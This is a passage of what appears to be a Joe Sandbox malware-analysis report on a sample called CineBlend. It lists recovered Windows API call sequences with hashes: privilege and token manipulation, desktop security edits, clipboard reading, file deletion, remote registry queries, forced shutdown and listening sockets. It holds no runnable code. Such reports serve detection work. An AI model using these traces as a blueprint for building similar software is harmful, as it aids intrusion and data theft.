                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 62c9573bf9f8b4b41f6536cce2cfc08df1448b21880288f66ab0c88eb88274f9
                                          • Instruction ID: 173a17bdd1087a37a5aae008c667dbc7484485a6d834a293c1a8caaf86c96738
                                          • Opcode Fuzzy Hash: 62c9573bf9f8b4b41f6536cce2cfc08df1448b21880288f66ab0c88eb88274f9
                                          • Instruction Fuzzy Hash: 24315571A812197AEF216BB55C49F7E7F6CEB44B54F1100B6FA01E71D1DAB05D009AA0
                                          APIs
                                            • Part of subcall function 00BA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
                                            • Part of subcall function 00BA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
                                            • Part of subcall function 00BA2010: GetLastError.KERNEL32 ref: 00BA2097
                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00BA1BD2
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00BA1BF4
                                          • CloseHandle.KERNEL32(?), ref: 00BA1C05
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA1C1D
                                          • GetProcessWindowStation.USER32 ref: 00BA1C36
                                          • SetProcessWindowStation.USER32(00000000), ref: 00BA1C40
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA1C5C
                                            • Part of subcall function 00BA1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA1B48), ref: 00BA1A20
                                            • Part of subcall function 00BA1A0B: CloseHandle.KERNEL32(?,?,00BA1B48), ref: 00BA1A35
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                          • String ID: $default$winsta0
                                          • API String ID: 22674027-1027155976
                                          • Opcode ID: 74735624195e0652eaa7d31952161b0e88f41de666c74f8f8aa7a965abbf55c5
                                          • Instruction ID: 83e6bf82cb727cce5f8012bcfbc3901f5afc87302e60749d81746945729c37cc
                                          • Opcode Fuzzy Hash: 74735624195e0652eaa7d31952161b0e88f41de666c74f8f8aa7a965abbf55c5
                                          • Instruction Fuzzy Hash: 5F81AD71905209AFDF119FA8CD49FEEBBF8EF09300F1448AAF954A71A0DB318945CB60
                                          APIs
                                            • Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
                                            • Part of subcall function 00BA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
                                            • Part of subcall function 00BA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
                                            • Part of subcall function 00BA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
                                            • Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA1518
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA154C
                                          • GetLengthSid.ADVAPI32(?), ref: 00BA1563
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00BA159D
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA15B9
                                          • GetLengthSid.ADVAPI32(?), ref: 00BA15D0
                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BA15D8
                                          • HeapAlloc.KERNEL32(00000000), ref: 00BA15DF
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA1600
                                          • CopySid.ADVAPI32(00000000), ref: 00BA1607
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA1636
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA1658
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA166A
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA1691
                                          • HeapFree.KERNEL32(00000000), ref: 00BA1698
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA16A1
                                          • HeapFree.KERNEL32(00000000), ref: 00BA16A8
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA16B1
                                          • HeapFree.KERNEL32(00000000), ref: 00BA16B8
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA16C4
                                          • HeapFree.KERNEL32(00000000), ref: 00BA16CB
                                            • Part of subcall function 00BA1ADF: GetProcessHeap.KERNEL32(00000008,00BA14FD,?,00000000,?,00BA14FD,?), ref: 00BA1AED
                                            • Part of subcall function 00BA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BA14FD,?), ref: 00BA1AF4
                                            • Part of subcall function 00BA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BA14FD,?), ref: 00BA1B03
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: 32f54c27e673ef769e35b66c41a014ecbb0bea2db8bf463ce3041945ca7fe520
                                          • Instruction ID: 7f5cafd5f5bce1d02b13d02ca16f611c6de8dbca8d8bd3d2d9bdf9f54c2b41df
                                          • Opcode Fuzzy Hash: 32f54c27e673ef769e35b66c41a014ecbb0bea2db8bf463ce3041945ca7fe520
                                          • Instruction Fuzzy Hash: A4717CB2905209BBDF50DFA9DC44FAEBBB8FF45340F084956E955E7190EB309905CBA0
                                          APIs
                                          • OpenClipboard.USER32(00BDDCD0), ref: 00BBF586
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BBF594
                                          • GetClipboardData.USER32(0000000D), ref: 00BBF5A0
                                          • CloseClipboard.USER32 ref: 00BBF5AC
                                          • GlobalLock.KERNEL32(00000000), ref: 00BBF5E4
                                          • CloseClipboard.USER32 ref: 00BBF5EE
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BBF619
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00BBF626
                                          • GetClipboardData.USER32(00000001), ref: 00BBF62E
                                          • GlobalLock.KERNEL32(00000000), ref: 00BBF63F
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BBF67F
                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00BBF695
                                          • GetClipboardData.USER32(0000000F), ref: 00BBF6A1
                                          • GlobalLock.KERNEL32(00000000), ref: 00BBF6B2
                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00BBF6D4
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BBF6F1
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BBF72F
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BBF750
                                          • CountClipboardFormats.USER32 ref: 00BBF771
                                          • CloseClipboard.USER32 ref: 00BBF7B6
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                          • String ID:
                                          • API String ID: 420908878-0
                                          • Opcode ID: 26ef32a0e7ee073f4da10b2901bcb69bf09de700ecaad6d0a265fe110ba516f5
                                          • Instruction ID: e04c1155998ba4547efc3c88785edf3687cafdb839f5b1429db708c093dcbb61
                                          • Opcode Fuzzy Hash: 26ef32a0e7ee073f4da10b2901bcb69bf09de700ecaad6d0a265fe110ba516f5
                                          • Instruction Fuzzy Hash: 46617D352042029FD310EF24DC95EBAB7E4EF84744F1445A9F88A872A2DF71DD45DBA2
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BB7403
                                          • FindClose.KERNEL32(00000000), ref: 00BB7457
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BB7493
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BB74BA
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB74F7
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB7524
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                          • API String ID: 3830820486-3289030164
                                          • Opcode ID: 9138f828032d0ef37af3dbb698f34ac22da3213f12b7d7423233fe521e7f16e3
                                          • Instruction ID: 2519e15838f0879dafb6f292455d029642c3a2dd9946ddcf61dd34888f7b1341
                                          • Opcode Fuzzy Hash: 9138f828032d0ef37af3dbb698f34ac22da3213f12b7d7423233fe521e7f16e3
                                          • Instruction Fuzzy Hash: 59D15F72508304AFC310EB64C881EBFB7ECEF98704F4409A9F58596291EB74DA44DB62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00BBA0A8
                                          • GetFileAttributesW.KERNEL32(?), ref: 00BBA0E6
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00BBA100
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BBA118
                                          • FindClose.KERNEL32(00000000), ref: 00BBA123
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBA13F
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBA18F
                                          • SetCurrentDirectoryW.KERNEL32(00C07B94), ref: 00BBA1AD
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBA1B7
                                          • FindClose.KERNEL32(00000000), ref: 00BBA1C4
                                          • FindClose.KERNEL32(00000000), ref: 00BBA1D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1409584000-438819550
                                          • Opcode ID: 26bb5a3e60436b0c0fe53f5602cd7cc72ed1793e69ff589a7d6252b1e81af850
                                          • Instruction ID: 51c575682435092508b9008d73e559fefb3972d92e440d1879af018f28e9b7ed
                                          • Opcode Fuzzy Hash: 26bb5a3e60436b0c0fe53f5602cd7cc72ed1793e69ff589a7d6252b1e81af850
                                          • Instruction Fuzzy Hash: 2031F7319012196BDB24AFB9DC49AEEB7ECDF05320F1005E6E855E3090FBB4DE45CA65
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BB4785
                                          • _wcslen.LIBCMT ref: 00BB47B2
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB47E2
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BB4803
                                          • RemoveDirectoryW.KERNEL32(?), ref: 00BB4813
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BB489A
                                          • CloseHandle.KERNEL32(00000000), ref: 00BB48A5
                                          • CloseHandle.KERNEL32(00000000), ref: 00BB48B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                          • String ID: :$\$\??\%s
                                          • API String ID: 1149970189-3457252023
                                          • Opcode ID: ba3eb777fa755de5eb0b73496ed8383ee52cd6a52b792fde7638fbaa88cbb782
                                          • Instruction ID: 0751f19fc2b36e448a538fad79ff3a9abc7225520401745ec8b0fd2619621e7b
                                          • Opcode Fuzzy Hash: ba3eb777fa755de5eb0b73496ed8383ee52cd6a52b792fde7638fbaa88cbb782
                                          • Instruction Fuzzy Hash: BD319CB190024AABDB219BA0DC49FEB77FCFF89710F1041B6F609D2061EBB49644CB24
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00BBA203
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BBA25E
                                          • FindClose.KERNEL32(00000000), ref: 00BBA269
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBA285
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBA2D5
                                          • SetCurrentDirectoryW.KERNEL32(00C07B94), ref: 00BBA2F3
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBA2FD
                                          • FindClose.KERNEL32(00000000), ref: 00BBA30A
                                          • FindClose.KERNEL32(00000000), ref: 00BBA31A
                                            • Part of subcall function 00BAE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BAE3B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 2640511053-438819550
                                          • Opcode ID: 8025b4471fbc13f2c06c6d9ca1eca7fd102c47f00194887891cd8485aac12689
                                          • Instruction ID: 0edb398a57410ca8977969c4555f5b9bbc7f03f8ab205b00108294b8022b40a7
                                          • Opcode Fuzzy Hash: 8025b4471fbc13f2c06c6d9ca1eca7fd102c47f00194887891cd8485aac12689
                                          • Instruction Fuzzy Hash: D33124319012096FCF20AFB4DC59AEEB7ECDF45320F1001E2E850A31A0EBB1DE85CA25
                                          APIs
                                            • Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC99E
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BCCA09
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCCA2D
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BCCA8C
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BCCB47
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCBB4
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCC49
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCCC9A
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BCCD43
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BCCDE2
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCCDEF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                          • String ID:
                                          • API String ID: 3102970594-0
                                          • Opcode ID: 4ab45926d49dda6ab2da417ecd19448aa80d3ce5dd5bb1065749aef4f55d935e
                                          • Instruction ID: 6b772c91fea299b08a2e67a008f5403a41d31dc01b77686bb46f0ab15f405fe5
                                          • Opcode Fuzzy Hash: 4ab45926d49dda6ab2da417ecd19448aa80d3ce5dd5bb1065749aef4f55d935e
                                          • Instruction Fuzzy Hash: 710220716042009FD715DF24C895F2ABBE5EF99314F1884ADF84ACB2A2DB31ED46CB91
                                          APIs
                                            • Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871
                                            • Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BAD9CD
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00BADA88
                                          • MoveFileW.KERNEL32(?,?), ref: 00BADA9B
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BADAB8
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BADAE2
                                            • Part of subcall function 00BADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00BADAC7,?,?), ref: 00BADB5D
                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00BADAFE
                                          • FindClose.KERNEL32(00000000), ref: 00BADB0F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 1946585618-1173974218
                                          • Opcode ID: 48c48f792c6ba514e3cac1d371aac16b48c03bac2306a912fac9bbf974a52d96
                                          • Instruction ID: 25aa2aa8124a1943bf1dbbc968bd14731d6d408a79a1fcfe6c94eb9bf59c697a
                                          • Opcode Fuzzy Hash: 48c48f792c6ba514e3cac1d371aac16b48c03bac2306a912fac9bbf974a52d96
                                          • Instruction Fuzzy Hash: 0361283180910DAECF05EBA0D992EEDB7F5AF15300F6041E9E546771A2EB31AF09DB61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 6b0aeda3c770c7e95324a72b8ff7e5dcaef60b1a732179c920b99c1cc3af05db
                                          • Instruction ID: 93f2521b6c06be38c4ce573df24e7c8cea07b2f81e77037c5376af76eedd3b8f
                                          • Opcode Fuzzy Hash: 6b0aeda3c770c7e95324a72b8ff7e5dcaef60b1a732179c920b99c1cc3af05db
                                          • Instruction Fuzzy Hash: 70418934605602EFE310CF25DC98B69BBE4FF44318F14C4A9E8698B662DB75ED42CB90
                                          APIs
                                            • Part of subcall function 00BA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
                                            • Part of subcall function 00BA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
                                            • Part of subcall function 00BA2010: GetLastError.KERNEL32 ref: 00BA2097
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00BAF249
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $ $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-3163812486
                                          • Opcode ID: 281b259abdde13bd11bb4b615d2c04e9ebc7b2907fc64c6fea01729b3bf26a58
                                          • Instruction ID: 2d0b8ad9606127273d691b67c98f39239d5e5236b8239ef09563c846a8cc098d
                                          • Opcode Fuzzy Hash: 281b259abdde13bd11bb4b615d2c04e9ebc7b2907fc64c6fea01729b3bf26a58
                                          • Instruction Fuzzy Hash: 8D01267A6193116BEB2823F89CCABFAB3ECDB0A344F1005B2FD03E30D1E9609C009190
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BC1CD3
                                          • WSAGetLastError.WSOCK32 ref: 00BC1CE0
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00BC1D17
                                          • WSAGetLastError.WSOCK32 ref: 00BC1D22
                                          • closesocket.WSOCK32(00000000), ref: 00BC1D51
                                          • listen.WSOCK32(00000000,00000005), ref: 00BC1D60
                                          • WSAGetLastError.WSOCK32 ref: 00BC1D6A
                                          • closesocket.WSOCK32(00000000), ref: 00BC1D99
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
